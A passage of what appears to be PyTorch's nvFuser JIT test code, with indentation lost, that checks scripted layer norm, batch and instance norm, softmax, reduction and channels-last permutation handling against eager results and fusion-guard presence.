jit_o = jit_model(shapes, *args, eps, use_cudnn)
jit_o.backward(grad)
ref_args = [t.detach().clone().requires_grad_() for t in args]
[t.grad.zero_() for t in args]
jit_o = jit_model(shapes, *args, eps, use_cudnn)
jit_o.backward(grad)
o = model(shapes, *ref_args, eps, use_cudnn)
o.backward(grad)
self.assertEqual(jit_o, o)
for arg, ref_arg in zip(args, ref_args):
self.assertEqual(arg.grad, ref_arg.grad)
# check fusion in fw & bw
g = jit_model.graph_for(shapes, *args, eps, use_cudnn)
for node in g.nodes():
n = node
dbg_state = jit_model.get_debug_state()
for val in dbg_state.execution_plans.values():
v = val
state2 = v.code.grad_executor_states()
for val in state2[0].execution_plans.values():
v2 = val
FileCheck().check(FUSION_GUARD).run(g)
FileCheck().check(FUSION_GUARD).run(v2.graph)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_layer_norm_autodiff(self):
def t_wb(shapes: List[int], x, w, b, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, w, b, eps, cudnn)
o = torch.relu(o)
return o
def t_w(shapes: List[int], x, w, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, w, None, eps, cudnn)
o = torch.relu(o)
return o
def t_b(shapes: List[int], x, b, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, None, b, eps, cudnn)
o = torch.relu(o)
return o
def t(shapes: List[int], x, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, None, None, eps, cudnn)
o = torch.relu(o)
return o
model = {3: t_wb, 2: t_w, 1: t_b, 0: t}
for w, b in itertools.product([True, False], repeat=2):
batch = [2]
# note: awkward shape here to avoid vectorized fast kernel, which is
# buggy in aten
shapes = [2, 7, 3]
m = model[w * 2 + b]
grad = torch.randn(batch + shapes, dtype=torch.float32, device="cuda")
args = [torch.randn(batch + shapes, dtype=torch.float32, device="cuda").requires_grad_()]
if w:
args.append(torch.randn(shapes, dtype=torch.float32, device="cuda").requires_grad_())
if b:
args.append(torch.randn(shapes, dtype=torch.float32, device="cuda").requires_grad_())
self._layer_norm_autodiff_helper(m, grad, shapes, args)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_layer_norm_parser(self):
dtype = torch.float32
device = "cuda"
x = torch.randn([4, 4, 2], dtype=dtype, device=device)
w = torch.randn([4, 2], dtype=dtype, device=device)
b = torch.randn([4, 2], dtype=dtype, device=device)
def t(x: torch.Tensor, w: torch.Tensor, b: torch.Tensor):
o = torch.relu(x)
o = torch.layer_norm(o, [4, 2], w, b, 1e-5)
return o
o = t(x, w, b)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, w, b)
jit_o = t_jit(x, w, b)
o = t(x, w, b)
self.assertGraphContains(t_jit.graph_for(x, w, b), FUSION_GUARD)
def _native_layer_norm_helper(self, shape, norm_shape, dtype, device, error, affine=True):
class MyLayerNorm(torch.nn.Module):
__constants__ = ['norm_shape']
def __init__(self, elementwise_affine=True):
super(MyLayerNorm, self).__init__()
self.norm_shape = norm_shape
if elementwise_affine:
self.weight = torch.randn(norm_shape, dtype=dtype, device=device)
self.bias = torch.randn(norm_shape, dtype=dtype, device=device)
with torch.no_grad():
self.weight.fill_(1)
self.bias.fill_(0)
else:
self.weight = None
self.bias = None
def forward(self, x: torch.Tensor):
o = torch.relu(x)
o = torch.native_layer_norm(o, self.norm_shape, self.weight, self.bias, 1e-5)
return o
t = MyLayerNorm(affine)
x = torch.randn(shape, dtype=dtype, device=device)
t_jit = torch.jit.script(t)
jit_o, jit_mean, jit_rstd = t_jit(x)
jit_o, jit_mean, jit_rstd = t_jit(x)
o, mean, rstd = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
# numerical issues here due to our scheduling.
# can't use `self.assertEqual(o, jit_o)`
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
self.assertTrue(self._compare("comparing mean failed", mean, jit_mean, error))
self.assertTrue(self._compare("comparing rstd failed", rstd, jit_rstd, error))
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_native_layer_norm(self):
dims = 4
rnds = 3
for idx in range(rnds):
for offset in range(1, dims):
for affine in (True, False):
input_shape = [random.randint(10, 30) for idx in range(dims)]
norm_shape = [input_shape[idx] for idx in range(dims - offset, dims)]
self._native_layer_norm_helper(input_shape, norm_shape, torch.float32, "cuda", 1e-4, affine)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_native_layer_norm_half(self):
dims = 4
rnds = 3
for idx in range(rnds):
for offset in range(1, dims):
input_shape = [random.randint(10, 30) for idx in range(dims)]
norm_shape = [input_shape[idx] for idx in range(dims - offset, dims)]
self._native_layer_norm_helper(input_shape, norm_shape, torch.float16, "cuda", 5e-3)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_native_layer_norm_bfloat(self):
dims = 4
rnds = 3
for idx in range(rnds):
for offset in range(1, dims):
input_shape = [random.randint(10, 30) for idx in range(dims)]
norm_shape = [input_shape[idx] for idx in range(dims - offset, dims)]
self._native_layer_norm_helper(input_shape, norm_shape, torch.bfloat16, "cuda", 1e-1)
def _norm_helper(self,
shape,
dtype,
device,
error,
is_batch_norm_else_instance_norm,
memory_format=torch.contiguous_format,
*,
layer_dtype=torch.float32):
class MyBatchNorm(torch.nn.Module):
def __init__(self):
super(MyBatchNorm, self).__init__()
def forward(self, x: torch.Tensor, r_mean: torch.Tensor, r_var: torch.Tensor):
o = torch.nn.functional.batch_norm(x, r_mean, r_var, training=True)
o = torch.relu(o)
return o
class MyInstanceNorm(torch.nn.Module):
def __init__(self):
super(MyInstanceNorm, self).__init__()
def forward(self, x: torch.Tensor, r_mean: torch.Tensor, r_var: torch.Tensor):
o = torch.nn.functional.instance_norm(x, r_mean, r_var, use_input_stats=True)
o = torch.relu(o)
return o
t = MyBatchNorm() if is_batch_norm_else_instance_norm else MyInstanceNorm()
x = torch.randn(shape, dtype=dtype, device=device).to(memory_format=memory_format)
running_mean = torch.zeros(shape[1], dtype=layer_dtype, device=device)
running_var = torch.ones(shape[1], dtype=layer_dtype, device=device)
t_jit = torch.jit.script(t)
eager_running_mean = running_mean.clone()
eager_running_var = running_var.clone()
jit_running_mean = running_mean.clone()
jit_running_var = running_var.clone()
jit_o = t_jit(x, running_mean.clone(), running_var.clone())
self.assertTrue(self._compare("prerun comparing running_mean failed", eager_running_mean, jit_running_mean, error))
self.assertTrue(self._compare("prerun comparing running_var failed", eager_running_var, jit_running_var, error))
jit_o = t_jit(x, jit_running_mean, jit_running_var)
o = t(x, eager_running_mean, eager_running_var)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.stride(), jit_o.stride())
# numerical issues here due to our scheduling.
# can't use `self.assertEqual(o, jit_o)`
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
self.assertTrue(self._compare("comparing running_mean failed", eager_running_mean, jit_running_mean, error))
self.assertTrue(self._compare("comparing running_var failed", eager_running_var, jit_running_var, error))
self.assertGraphContains(t_jit.graph_for(x, running_mean, running_var), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_layer_norm_trivial_reduce_dim(self):
def t_wb(shapes: List[int], x, w, b, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, w, b, eps, cudnn)
o = torch.relu(o)
return o
batch = [1]
shapes = [2, 7, 3]
grad = torch.randn(batch + shapes, dtype=torch.float32, device="cuda")
args = [torch.randn(batch + shapes, dtype=torch.float32, device="cuda").requires_grad_()]
args.append(torch.randn(shapes, dtype=torch.float32, device="cuda").requires_grad_())
args.append(torch.randn(shapes, dtype=torch.float32, device="cuda").requires_grad_())
self._layer_norm_autodiff_helper(t_wb, grad, shapes, args)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm_half_layer(self):
size = [2, 4, 2, 2]
for is_batch_norm_else_instance_norm in [False, True]:
for mf in [torch.channels_last, torch.contiguous_format]:
self._norm_helper(size, torch.float16, "cuda", 1e-3, is_batch_norm_else_instance_norm,
memory_format=mf, layer_dtype=torch.float16)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm_channels_last(self):
size = [3, 4, 5, 6]
with torch.backends.cudnn.flags(enabled=False):
for is_batch_norm_else_instance_norm in [False, True]:
for mf in [torch.channels_last, torch.contiguous_format]:
self._norm_helper(size, torch.float32, "cuda", 1e-4, is_batch_norm_else_instance_norm, memory_format=mf)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm(self):
output_elements = 10000
channel_sizes = [67, 457, 1024, 4096]
with torch.backends.cudnn.flags(enabled=False):
for is_batch_norm_else_instance_norm in [False, True]:
for dims in range(3, 6):
output_size = int(pow(output_elements, 1. / (dims - 1)))
for C in channel_sizes:
x = [output_size for idx in range(dims)]
x[1] = C
self._norm_helper(x, torch.float32, "cuda", 1e-4, is_batch_norm_else_instance_norm)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm_large(self):
output_elements = 262144
channel_sizes = 67, 457, 1024
for is_batch_norm_else_instance_norm in [True, False]:
for dims in range(3, 6):
output_size = int(pow(output_elements, 1. / (dims - 1)))
for C in channel_sizes:
x = [output_size for idx in range(dims)]
x[1] = C
self._norm_helper(x, torch.float32, "cuda", 1e-4, is_batch_norm_else_instance_norm)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm_half(self):
output_elements = 10000
channel_sizes = [67, 457, 1024, 4096]
with torch.backends.cudnn.flags(enabled=False):
for is_batch_norm_else_instance_norm in [False, True]:
for dims in range(3, 6):
output_size = int(pow(output_elements, 1. / (dims - 1)))
for C in channel_sizes:
x = [output_size for idx in range(dims)]
x[1] = C
self._norm_helper(x, torch.float16, "cuda", 5e-3, is_batch_norm_else_instance_norm)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_norm_bfloat(self):
output_elements = 10000
channel_sizes = [67, 457, 1024, 4096]
with torch.backends.cudnn.flags(enabled=False):
for is_batch_norm_else_instance_norm in [False, True]:
for dims in range(3, 6):
output_size = int(pow(output_elements, 1. / (dims - 1)))
for C in channel_sizes:
x = [output_size for idx in range(dims)]
x[1] = C
self._norm_helper(x, torch.bfloat16, "cuda", 1e-1, is_batch_norm_else_instance_norm)
def _softmax_helper(self, shape, reduction_axis, is_log_softmax, dtype, device, error):
class MySoftmax(torch.nn.Module):
__constants__ = ['reduction_axis']
def __init__(self):
super(MySoftmax, self).__init__()
self.reduction_axis = reduction_axis
def forward(self, x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.nn.functional.softmax(o, dim=self.reduction_axis)
return o
class MyLogSoftmax(torch.nn.Module):
__constants__ = ['reduction_axis']
def __init__(self):
super(MyLogSoftmax, self).__init__()
self.reduction_axis = reduction_axis
def forward(self, x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.nn.functional.log_softmax(o, dim=self.reduction_axis)
return o
gradient_check = (dtype == torch.float64)
t = MyLogSoftmax() if is_log_softmax else MySoftmax()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=gradient_check)
y = torch.randn(shape, dtype=dtype, device=device, requires_grad=gradient_check)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
if gradient_check:
gradcheck(t_jit.forward, [x, y], nondet_tol=1e-5)
else:
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
# numerical issues here due to our scheduling.
# can't use `self.assertEqual(o, jit_o)`
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_softmax_dtype(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.mul(x, y)
o = torch.nn.functional.softmax(o, dim=0, dtype=torch.float32)
return o
x = torch.randn([4, 4], dtype=torch.float16, device="cuda").requires_grad_()
y = torch.randn_like(x).requires_grad_()
grad = torch.randn_like(x).float()
ref_x = x.detach().requires_grad_()
ref_y = y.detach().requires_grad_()
o = t(ref_x, ref_y)
o.backward(grad)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o.backward(grad)
jit_o = t_jit(x, y)
jit_o.backward(grad)
jit_o = t_jit(x, y)
jit_o.backward(grad)
x.grad.zero_()
y.grad.zero_()
jit_o = t_jit(x, y)
jit_o.backward(grad)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(ref_x.grad, x.grad)
self.assertEqual(ref_y.grad, y.grad)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-3))
self.assertGraphContainsExactly(t_jit.graph_for(x, y), FUSION_GUARD, 1, consider_subgraphs=True)
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GUARD).run(bwd_graph)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test__softmax_function(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.mul(x, y)
o = torch._softmax(o, dim=-1, half_to_float=False)
return o
x = torch.randn([4, 4], dtype=torch.float16, device="cuda")
y = torch.randn_like(x)
o = t(x, y)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-3))
self.assertGraphContainsExactly(t_jit.graph_for(x, y), FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test__softmax_function_half_to_float(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.mul(x, y)
o = torch._softmax(o, dim=-1, half_to_float=True)
return o
x = torch.randn([4, 4], dtype=torch.float16, device="cuda")
y = torch.randn_like(x)
o = t(x, y)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-3))
self.assertGraphContainsExactly(t_jit.graph_for(x, y), FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_softmax(self):
output_size = 10000
dims = 4
output_size = int(pow(output_size, 1. / dims))
reduction_sizes = [67, 256, 1024, 4096]
# gradient check
for reduction_dim in range(dims):
for is_log_softmax in [False, True]:
shape = [output_size for idx in range(dims)]
self._softmax_helper(shape, reduction_dim, is_log_softmax, torch.float64, "cuda", 1e-4)
for reduction_dim in range(dims):
for reduction_size in reduction_sizes:
x = [output_size for idx in range(dims)]
x[reduction_dim] = reduction_size
for is_log_softmax in [False, True]:
self._softmax_helper(x, reduction_dim, is_log_softmax, torch.float32, "cuda", 1e-4)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_softmax_half(self):
output_size = 10000
dims = 4
output_size = int(pow(output_size, 1. / dims))
reduction_sizes = [67, 256, 1024, 4096]
for reduction_dim in range(dims):
for reduction_size in reduction_sizes:
x = [output_size for idx in range(dims)]
x[reduction_dim] = reduction_size
for is_log_softmax in [False, True]:
self._softmax_helper(x, reduction_dim, is_log_softmax, torch.float16, "cuda", 5e-3)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_softmax_bfloat(self):
output_size = 10000
dims = 4
output_size = int(pow(output_size, 1. / dims))
reduction_sizes = [67, 256, 1024, 4096]
for reduction_dim in range(dims):
for reduction_size in reduction_sizes:
x = [output_size for idx in range(dims)]
x[reduction_dim] = reduction_size
for is_log_softmax in [False, True]:
self._softmax_helper(x, reduction_dim, is_log_softmax, torch.bfloat16, "cuda", 1e-1)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction_permutation(self):
x = [7, 8, 12]
# note that num_dim is exclusive from len(x), so we are not reducing
# to single element (codegen limitation at this moment)
for num_reduce_dim in range(1, len(x)):
for axes in itertools.combinations(range(len(x)), num_reduce_dim):
for perm0 in itertools.permutations(range(len(x))):
for perm1 in itertools.permutations(range(len(x))):
self._reduction_helper(x, axes, torch.float32, "cuda", perm0, perm1)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction_multiple_output(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
torch._C._jit_set_bailout_depth(20)
def t(x: torch.Tensor, y: torch.Tensor, scale: float, z: torch.Tensor):
o = torch.mul(x, y)
o = torch.mul(o, scale)
out1 = torch.mul(o, z)
out2 = torch.sum(out1, dim=[2])
return out1, out2
t_jit = torch.jit.script(t)
x = torch.randn(8, 4, 10, 16, dtype=torch.float, device="cuda")
y = torch.randn(8, 4, 10, 16, dtype=torch.float, device="cuda")
z = torch.randn(8, 4, 10, 16, dtype=torch.float, device="cuda")
scale = 0.5
jit_o = t_jit(x, y, scale, z)
jit_o = t_jit(x, y, scale, z)
o = t(x, y, scale, z)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, scale, z), FUSION_GUARD)
x = x.to(memory_format=torch.channels_last)
y = y.to(memory_format=torch.channels_last)
z = z.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y, scale, z)
jit_o = t_jit(x, y, scale, z)
o = t(x, y, scale, z)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, scale, z), FUSION_GUARD)
torch._C._jit_set_nvfuser_guard_mode(old_guard)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_channels_last_with_broadcast(self):
# setting this true forces a new graph to be generated with a new
# input a different broadcast shape
torch._C._jit_set_nvfuser_guard_mode(True)
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.mul(x, y)
o = o + 2.0
return o
t_jit = torch.jit.script(t)
# Single Channel broadcasts
# Test 1
x = torch.randn(8, 4, 10, 16, dtype=torch.float, device="cuda")
x = x.to(memory_format=torch.channels_last)
y = torch.randn(8, 4, 10, 1, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
# Test 2
y = torch.randn(8, 4, 1, 16, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
# Test 3
y = torch.randn(8, 1, 10, 16, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
# Test 3
y = torch.randn(1, 4, 10, 16, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
'''
Currently, the JIT doesn't have tensor merge logic to handle adding
a broadcast tensor with more than one broadcast into a non-broadcast
tensor. Therefore, either of these tests can fail depending on the
sort implementation. The second test is known to fail.
# Two Channel broadcasts
# Test 1
y = torch.randn(8, 4, 1, 1, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
# Test 2
y = torch.randn(8, 4, 1, 1, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last).transpose(2,3)
x = x.transpose(2,3)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
'''
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_pw_single_reduction_partition(self):
sizes = [2, 2, 2]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device)
y = torch.randn(sizes, dtype=dtype, device=device)
z = torch.randn(sizes, dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = torch.add(x, y)
o = torch.sum(o, dim=[0])
o = torch.add(o, z)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_permutation_preservation(self):
sizes = [2, 3, 4, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
def t(x: torch.Tensor):
o = torch.relu(x)
o = torch.sum(o, dim=[0])
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
# TODO: we could preserve permutation to inputs
self.assertEqual(o.stride(), jit_o.stride())
def t(x: torch.Tensor):
o = torch.relu(x)
o = torch.add(o, 1.0)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
self.assertTrue(jit_o.is_contiguous(memory_format=torch.channels_last))
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_permutation_preservation_edge_case_0(self):
sizes = [2, 3, 4, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
# mismatch rank with *note* different permutation recognized by PE
bias = torch.randn(3, dtype=dtype, device=device).unsqueeze(-1).unsqueeze(-1)
def t(x, y):
return x + y
t_jit = torch.jit.script(t)
with nvfuser_singleton_fusion(True):
for _ in range(5):
jit_o = t_jit(x, bias)
o = t(x, bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(o.stride(), jit_o.stride())
self.assertGraphContains(t_jit.graph_for(x, bias), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_permutation_preservation_edge_case_1_broken(self):
sizes = [2, 3, 4, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
# in-compatible permutation, this will cause format propagation to break
bias = torch.randn(4, 5, dtype=dtype, device=device)
def t(x, y):
return x + y
t_jit = torch.jit.script(t)
with nvfuser_singleton_fusion(True):
for _ in range(5):
jit_o = t_jit(x, bias)
o = t(x, bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
try:
# nvfuser does not support in-compatible permutation, this will throw
self.assertEqual(o.stride(), jit_o.stride())
except Exception as e:
warnings.warn(
"permutation propagatoin is broken, proper support should come after nvfuser permutation scheduler update")
self.assertGraphContains(t_jit.graph_for(x, bias), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_permutation_preservation_edge_case_2(self):
sizes = [2, 3, 4, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
y = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
z = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
def t(x, y, w):
tmp = torch.lerp(x, y, w)
tmp = torch.clamp(tmp, -1.0, 0.5)
tmp = torch.nn.functional.softplus(tmp)
return torch.threshold(tmp, -2.0, 0.5)
t_jit = torch.jit.script(t)
with nvfuser_singleton_fusion(True):
for _ in range(5):
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(o.stride(), jit_o.stride())
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
